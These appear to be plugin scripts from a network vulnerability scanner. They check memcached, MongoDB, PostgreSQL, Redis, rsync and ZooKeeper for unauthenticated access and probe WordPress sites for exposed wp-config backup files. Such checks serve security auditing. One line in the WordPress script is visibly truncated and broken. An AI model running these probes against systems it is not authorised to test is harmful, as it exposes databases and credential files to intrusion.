/scripts/unauthorized_access_memcached.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | # memcached 未授权访问
6 |
7 | import socket
8 | from lib.common.utils import save_script_result
9 |
10 | ports_to_check = 11211 # 默认扫描端口
11 |
12 |
13 | def do_check(self, url):
14 | if url != '/':
15 | return
16 | port = 11211
17 | if self.scheme == 'memcached' and self.port != 11211: # 非标准端口
18 | port = self.port
19 | elif 11211 not in self.ports_open:
20 | return
21 | try:
22 | socket.setdefaulttimeout(5)
23 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
24 | s.connect((self.host, port))
25 | s.send(bytes('stats\r\n', 'UTF-8'))
26 | if 'version' in s.recv(1024).decode():
27 | save_script_result(self, '', 'memcached://%s:%s' % (self.host, port), 'Memcached Unauthorized Accesss')
28 | s.close()
29 | except Exception as e:
30 | pass
31 | finally:
32 | s.close()
33 |
--------------------------------------------------------------------------------
/scripts/unauthorized_access_mongodb.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # -*- encoding: utf-8 -*-
3 |
4 | # mongodb 未授权访问
5 |
6 | import pymongo
7 | from lib.common.utils import save_script_result
8 |
9 |
10 | ports_to_check = 27017 # 默认扫描端口
11 |
12 |
13 | def do_check(self, url):
14 | if url != '/':
15 | return
16 | port = 27017
17 | if self.scheme == 'mongodb' and self.port != 27017: # 非标准端口
18 | port = self.port
19 | elif 27017 not in self.ports_open:
20 | return
21 |
22 | try:
23 | conn = pymongo.MongoClient(host=self.host, port=port, connectTimeoutMS=5000, socketTimeoutMS=5000)
24 | database_list = conn.list_database_names()
25 | if not database_list:
26 | conn.close()
27 | return
28 | detail = "%s MongoDB Unauthorized Access : %s" % (self.host, ",".join(database_list))
29 | conn.close()
30 | save_script_result(self, '', 'mongodb://%s:%s' % (self.host, port), detail)
31 | except Exception as e:
32 | pass
33 |
--------------------------------------------------------------------------------
/scripts/unauthorized_access_postgresb.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # -*- encoding: utf-8 -*-
3 |
4 | # PostgreSQL 空口令访问
5 | import psycopg2
6 | from lib.common.utils import save_script_result
7 |
8 |
9 | ports_to_check = 5432 # 默认扫描端口
10 |
11 |
12 | def do_check(self, url):
13 | if url != '/':
14 | return
15 | port = 5432
16 | if self.scheme == 'PostgreSQL' and self.port != 5432: # 非标准端口
17 | port = self.port
18 | elif 5432 not in self.ports_open:
19 | return
20 |
21 | try:
22 | conn = psycopg2.connect(database="postgres", user="postgres", password="", host=self.host, port=port)
23 | save_script_result(self, '', 'mysql://%s:%s' % (self.host, port), '', 'PostgreSQL empty password')
24 | except Exception as e:
25 | pass
26 |
--------------------------------------------------------------------------------
/scripts/unauthorized_access_redis.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- encoding: utf-8 -*-
3 |
4 | # redis 未授权访问
5 | import socket
6 | from lib.common.utils import save_script_result
7 |
8 |
9 | ports_to_check = 6379 # 默认扫描端, 会扫描端口是否开放
10 |
11 |
12 | def do_check(self, url):
13 | if url != '/':
14 | return
15 | port = 6379
16 | # 非标准端口,不需要检查6379端口是否开放
17 | # 支持用户传入目标 redis://test.ip:16379 来扫描非标准端口上的Redis服务
18 | if self.scheme == 'redis' and self.port != 6379:
19 | port = self.port
20 | elif 6379 not in self.ports_open:
21 | return
22 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
23 | s.settimeout(3)
24 | try:
25 | s.connect((self.host, port))
26 | # payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
27 | # s.send(payload)
28 | s.send(bytes("INFO\r\n", 'UTF-8'))
29 | data = s.recv(1024).decode()
30 | s.close()
31 | if "redis_version" in data:
32 | save_script_result(self, '', 'redis://%s:%s' % (self.host, port), 'Redis Unauthorized Access')
33 | except Exception as e:
34 | s.close()
35 |
36 |
--------------------------------------------------------------------------------
/scripts/unauthorized_access_rsync.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- encoding: utf-8 -*-
3 |
4 | # rsync 未授权访问
5 | import socket
6 | from lib.common.utils import save_script_result
7 |
8 |
9 | ports_to_check = 873 # 默认扫描端, 会扫描端口是否开放
10 |
11 |
12 | def do_check(self, url):
13 | if url != '/':
14 | return
15 | port = 873
16 | # 非标准端口,不需要检查端口是否开放
17 | if self.scheme == 'rsync' and self.port != 873:
18 | port = self.port
19 | elif 873 not in self.ports_open:
20 | return
21 |
22 | try:
23 | socket.setdefaulttimeout(5)
24 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
25 | s.connect((self.host, port))
26 | s.send(bytes("", 'UTF-8'))
27 | result = s.recv(1024).decode()
28 | # print(result)
29 | if "RSYNCD" in result:
30 | save_script_result(self, '', 'rsync://%s:%s' % (self.host, port), 'Rsync Unauthorized Access')
31 | except Exception as e:
32 | s.close()
33 |
34 |
--------------------------------------------------------------------------------
/scripts/unauthorized_access_zookeeper.py:
--------------------------------------------------------------------------------
1 | # coding=utf-8
2 |
3 | # zookeeper 未授权访问
4 |
5 | import socket
6 | from lib.common.utils import save_script_result
7 |
8 | ports_to_check = 2181 # 默认服务端口
9 |
10 |
11 | def do_check(self, url):
12 | if url != '/':
13 | return
14 | port = 2181
15 | if self.scheme == ' zookeeper' and self.port != 2181: # 非标准端口
16 | port = self.port
17 | elif 2181 not in self.ports_open:
18 | return
19 |
20 | try:
21 | socket.setdefaulttimeout(5)
22 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
23 | s.connect((self.host, port))
24 | s.send(bytes('envi', 'UTF-8'))
25 | data = s.recv(1024).decode()
26 | if 'Environment' in data:
27 | save_script_result(self, '', 'zookeeper://%s:%s' % (self.host, port), '', 'Zookeeper Unauthorized Access')
28 | except Exception as e:
29 | pass
30 | finally:
31 | s.close()
32 |
--------------------------------------------------------------------------------
/scripts/wordpress_backup_file.py:
--------------------------------------------------------------------------------
1 | # Wordpress
2 |
3 | from lib.common.utils import save_script_result
4 |
5 |
6 | def do_check(self, url):
7 | if url == '/' and self.session:
8 | if self.index_html_doc.find('/wp-content/themes/') >= 0:
9 | url_lst = ['/wp-config.php.inc',
10 | '/wp-config.inc',
11 | '/wp-config.bak',
12 | '/wp-config.php~',
13 | '/.wp-config.php.swp',
14 | '/wp-config.php.bak']
15 | for _url in url_lst:
16 | status, headers, html_doc = self.http_request(_url)
17 | if status == 200 or status == 206:
18 | if html_doc.find('= 0:
19 | save_script_result(self, status, self.base_url + _url, '', 'WordPress Backup File Found')
20 |
--------------------------------------------------------------------------------